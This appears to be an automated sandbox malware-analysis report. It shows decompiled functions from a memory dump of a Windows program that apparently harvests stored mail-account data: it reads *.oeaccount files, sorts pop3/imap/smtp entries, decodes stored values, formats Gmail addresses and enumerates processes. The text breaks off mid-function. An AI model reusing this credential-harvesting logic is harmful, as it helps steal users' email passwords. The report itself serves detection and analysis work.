0x00407fe5
0x00407fea
0x00000000
0x00000000
0x00000000
0x00407f26
0x00407f26
0x00407f31
0x00407f36
0x00407f3d
0x00407f4c
0x00407f54
0x00407f5c
0x00407f64
0x00407f68
0x00407f6c
0x00407f74
0x00000000
0x00000000
0x00407f7a
0x00407fc4
0x00407fc4
0x00407fc8
0x00407fca
0x00407fcb
0x00407fcf
0x00407fd2
0x00407fd7
0x00407fd7
0x00000000
0x00407fc8
0x00407f83
0x00407f8c
0x00407f8e
0x00407f8e
0x00407f94
0x00407f98
0x00407f9d
0x00407fa7
0x00407fb2
0x00407fb2
0x00407f9f
0x00407f9f
0x00407f9f
0x00407f9f
0x00407f9d
0x00407fbd
0x00407fc3
0x00000000
0x00407fda
0x00407fda
0x00407fdb
0x00000000

APIs

GetMenuItemCount.USER32 ref: 00407F10
memset.MSVCRT ref: 00407F31
GetMenuItemInfoA.USER32 ref: 00407F6C
strchr.MSVCRT ref: 00407F83

Strings

6, xrefs: 00407F54
0, xrefs: 00407F4C

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ItemMenu$CountInfomemsetstrchr
String ID: 0$6
API String ID: 2300387033-3849865405
Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E004021D8( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060D0(_t44,  &_v796);
				E004060D0(_t44,  &_v408, _t58 + 0x204);
				E004060D0(_t44,  &_v928, _t58 + 4);
				E004060D0(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L004115B2();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L004115B2();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L004115B2();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
			}

0x004044da
0x004044e6
0x004044ee
0x004044f1
0x004044fc
0x004044ff
0x0040450b
0x0040450e
0x00404515
0x00404527
0x00404536
0x00404548
0x0040455a
0x0040455f
0x00404565
0x0040456a
0x0040456b
0x00404575
0x00404583
0x00404588
0x00404589
0x00404592
0x004045a0
0x004045a5
0x004045a6
0x004045af
0x004045b1
0x004045b1
0x00404594
0x00404594
0x00404594
0x00404577
0x00404577
0x00404577
0x004045c1
0x004045ca
0x004045e5

APIs

Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

_stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
_stricmp.MSVCRT(?,imap), ref: 00404589

Strings

imap, xrefs: 00404583
smtp, xrefs: 004045A0
pop3, xrefs: 00404565

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp$memcpystrlen
String ID: imap$pop3$smtp
API String ID: 445763297-821077329
Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E004021D8( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E00402407( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}

0x004036cc
0x004036cc
0x004036dc
0x004037ae
0x004037ae
0x004036ed
0x004036f0
0x004036f7
0x00403702
0x00403706
0x0040370b
0x00403711
0x0040371e
0x00403721
0x0040372f
0x0040373f
0x0040374b
0x00403755
0x0040376e
0x00403783
0x00403788
0x00403799
0x004037a7
0x004037a7
0x00403711
0x00000000

APIs

Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975

strchr.MSVCRT ref: 00403706
strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
strlen.MSVCRT ref: 0040375F
sprintf.MSVCRT ref: 00403783
strcpy.MSVCRT(?,?), ref: 00403799

Strings

%s@gmail.com, xrefs: 0040377D

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
String ID: %s@gmail.com
API String ID: 2649369358-4097000612
Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}

0x0040684d
0x0040685c
0x00406866
0x0040686d
0x00406872
0x00406875
0x0040687a
0x0040687d
0x00406883
0x00406886
0x00406889
0x0040689a
0x004068a6
0x004068ab
0x004068bb
0x004068c5
0x004068c9
0x004068ce
0x004068d9
0x004068e1
0x004068e4
0x004068e7
0x004068e7
0x004068ea
0x004068ea
0x004068f0
0x004068f1
0x004068f4
0x004068f7
0x004068ff

APIs

memset.MSVCRT ref: 0040686D
sprintf.MSVCRT ref: 0040689A
strlen.MSVCRT ref: 004068A6
memcpy.MSVCRT ref: 004068BB
strlen.MSVCRT ref: 004068C9
memcpy.MSVCRT ref: 004068D9

Strings

%s (%s), xrefs: 00406894

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memcpystrlen$memsetsprintf
String ID: %s (%s)
API String ID: 3756086014-1363028141
Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040E906(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}

0x0040e906
0x0040e90d
0x0040e91d
0x0040e92a
0x0040e92e
0x00000000
0x0040e956
0x0040e956
0x0040e95c
0x0040e960
0x0040e960
0x0040e966
0x0040e971
0x0040e975
0x00000000
0x0040e97d

APIs

UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
memcpy.MSVCRT ref: 0040E966
CoTaskMemFree.OLE32(?,?), ref: 0040E975

Strings

5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
00000000-0000-0000-0000-000000000000, xrefs: 0040E925

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FromStringUuid$FreeTaskmemcpy
String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
API String ID: 1640410171-3316789007
Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00410BC7(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _t12;
				void* _t15;
				char* _t19;
				void* _t25;
				void* _t28;
				long _t31;

				_t12 = E00405ECB(_a8);
				_a8 = _t12;
				if(_t12 != 0xffffffff) {
					_t31 = GetFileSize(_t12, 0);
					_t37 = _t31 - 2;
					if(_t31 > 2) {
						_t3 = _t31 + 2; // 0x2
						_t15 = _t3;
						L004115D0();
						_t25 = _t15;
						_t28 = _t15;
						SetFilePointer(_a8, 2, 0, 0);
						_t5 = _t31 - 2; // -2
						E004066F6(_t25, _a8, _t28, _t5);
						_t19 = _t28 + _t31;
						 *((char*)(_t19 - 2)) = 0;
						 *((char*)(_t19 - 1)) = 0;
						 *_t19 = 0;
						E00410A8A(_t25, _t37, _a4, _t28);
						_push(_t28);
						L004115D6();
					}
					return CloseHandle(_a8);
				}
				return _t12;
			}

0x00410bcd
0x00410bd6
0x00410bd9
0x00410be7
0x00410be9
0x00410bec
0x00410bee
0x00410bee
0x00410bf3
0x00410bf8
0x00410c00
0x00410c02
0x00410c08
0x00410c10
0x00410c18
0x00410c1f
0x00410c22
0x00410c25
0x00410c27
0x00410c2c
0x00410c2d
0x00410c33
0x00000000
0x00410c3e
0x00410c40

APIs

Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD

GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
??2@YAPAXI@Z.MSVCRT ref: 00410BF3
SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02

Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D

Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF

??3@YAXPAX@Z.MSVCRT ref: 00410C2D
CloseHandle.KERNEL32(?), ref: 00410C37

Strings

rA, xrefs: 00410BC7

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
String ID: rA
API String ID: 1886237854-474049127
Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00409E32, Relevance: 10.5, APIs: 7, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}

0x00409e38

APIs

Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040

ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
LoadIconA.USER32 ref: 00409E7D
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
LoadIconA.USER32 ref: 00409E9B
ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
String ID:
API String ID: 3673709545-0
Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18

Uniqueness

Uniqueness Score: -1.00%

Function 00409E33, Relevance: 10.5, APIs: 7, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}

0x00409e38

APIs

Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040

ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
LoadIconA.USER32 ref: 00409E7D
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
LoadIconA.USER32 ref: 00409E9B
ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
String ID:
API String ID: 3673709545-0
Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18

Uniqueness

Uniqueness Score: -1.00%

Function 00407D0A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00407D0A(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E004118A0(0x1004, _t17);
				_t21 =  *0x4171b8;
				if( *0x4171b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4172c0, "dialog_%d",  *0x417300);
					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407CAD, 0);
				}
				return _t8;
			}

0x00407d12
0x00407d17
0x00407d1e
0x00407d2e
0x00407d35
0x00407d4a
0x00407d65
0x00407d71
0x00407d71
0x00000000
0x00407d81
0x00407d88

APIs

memset.MSVCRT ref: 00407D35
sprintf.MSVCRT ref: 00407D4A

Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45

SetWindowTextA.USER32(?,?), ref: 00407D71
EnumChildWindows.USER32 ref: 00407D81

Strings

dialog_%d, xrefs: 00407D40
caption, xrefs: 00407D56

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
String ID: caption$dialog_%d
API String ID: 246480800-4161923789
Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E255, Relevance: 9.1, APIs: 6, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				unsigned int _v16;
				int _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v308;
				intOrPtr _v312;
				void _v316;
				void _v579;
				char _v580;
				char _v844;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				char _v1132;
				char _v17516;
				void* __edi;
				void* __esi;
				void* _t63;
				void* _t64;
				void* _t77;
				intOrPtr _t84;
				void _t94;
				int _t102;
				void* _t106;
				void* _t107;

				E004118A0(0x446c, __ecx);
				_t102 = 0;
				_v20 = 0;
				if(E0040629C() == 0 ||  *0x417518 == 0) {
					if( *0x417514 != _t102) {
						_t94 = _a4;
						_t63 =  *0x416fe0(8, _t94);
						_v8 = _t63;
						if(_t63 != 0xffffffff) {
							_v20 = 1;
							_v1132 = 0x224;
							_t64 =  *0x416fd8(_t63,  &_v1132);
							while(_t64 != 0) {
								memset( &_v316, _t102, 0x118);
								_v312 = _v1104;
								_v316 = _t94;
								strcpy( &_v308,  &_v844);
								_v44 = _v1108;
								_t107 = _t107 + 0x14;
								_v40 = _v1112;
								_v1132 = 0x224;
								if(E0040E45F(_a8,  &_v316) != 0) {
									_t64 =  *0x416fd4(_v8,  &_v1132);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t77 = OpenProcess(0x410, 0, _a4);
					_v8 = _t77;
					if(_t77 != 0) {
						_push( &_v16);
						_push(0x4000);
						_push( &_v17516);
						_push(_t77);
						if( *0x416fe4() != 0) {
							_t6 =  &_v16;
							 *_t6 = _v16 >> 2;
							_v20 = 1;
							_v12 = 0;
							if( *_t6 != 0) {
								while(1) {
									_v580 = 0;
									memset( &_v579, _t102, 0x104);
									memset( &_v316, _t102, 0x118);
									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
									_t107 = _t107 + 0x18;
									_v316 = _a4;
									_v312 = _t84;
									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
									E0040E172( &_v308,  &_v580);
									_push(0xc);
									_push( &_v32);
									_push(_v312);
									_push(_v8);
									if( *0x416fe8() != 0) {
										_v44 = _v28;
										_v40 = _v32;
									}
									if(E0040E45F(_a8,  &_v316) == 0) {
										goto L18;
									}
									_v12 = _v12 + 1;
									if(_v12 < _v16) {
										_t102 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v8);
					}
				}
				return _v20;
			}

0x0040e25d
0x0040e265
0x0040e267
0x0040e271
0x0040e395
0x0040e39b
0x0040e3a1
0x0040e3aa
0x0040e3ad
0x0040e3c0
0x0040e3c7
0x0040e3cd
0x0040e44a
0x0040e3e2
0x0040e3ed
0x0040e401
0x0040e407
0x0040e412
0x0040e41b
0x0040e41e
0x0040e42b
0x0040e438
0x0040e444
0x00000000
0x0040e444
0x00000000
0x0040e438
0x00000000
0x0040e44a
0x0040e3ad
0x0040e283
0x0040e28c
0x0040e294
0x0040e297
0x0040e2a0
0x0040e2a1
0x0040e2ac
0x0040e2ad
0x0040e2b6
0x0040e2bc
0x0040e2bc
0x0040e2c0
0x0040e2c7
0x0040e2ca
0x0040e2d9
0x0040e2e2
0x0040e2e9
0x0040e2fb
0x0040e306
0x0040e30d
0x0040e311
0x0040e322
0x0040e328
0x0040e33a
0x0040e33f
0x0040e344
0x0040e345
0x0040e34b
0x0040e356
0x0040e35b
0x0040e361
0x0040e361
0x0040e375
0x00000000
0x00000000
0x0040e37b
0x0040e384
0x0040e2d7
0x00000000
0x00000000
0x0040e38a
0x00000000
0x0040e384
0x0040e2d9
0x0040e2ca
0x0040e44e
0x0040e451
0x0040e451
0x0040e297
0x0040e45e

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
memset.MSVCRT ref: 0040E2E9
memset.MSVCRT ref: 0040E2FB

Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198

memset.MSVCRT ref: 0040E3E2
strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: memset$strcpy$CloseHandleOpenProcess
String ID:
API String ID: 3799309942-0
Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00409369, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 106
stringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v48;
				char _v68;
				void _v96;
				void* __edi;
				signed int _t51;
				char* _t53;
				char* _t63;
				intOrPtr* _t69;
				signed int _t70;
				char _t84;
				intOrPtr* _t91;
				signed int _t95;
				void* _t96;
				void* _t97;

				_t69 = __ebx;
				_t70 = 6;
				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
				_t97 = _t96 + 0xc;
				asm("movsw");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00405EFD(_a4, "<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
					do {
						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
						_v8 = _t51;
						_t53 =  &_v96;
						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
							_t53 =  &_v48;
						}
						_t91 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t53;
						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
						E0040F071(_v28,  &_v68);
						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
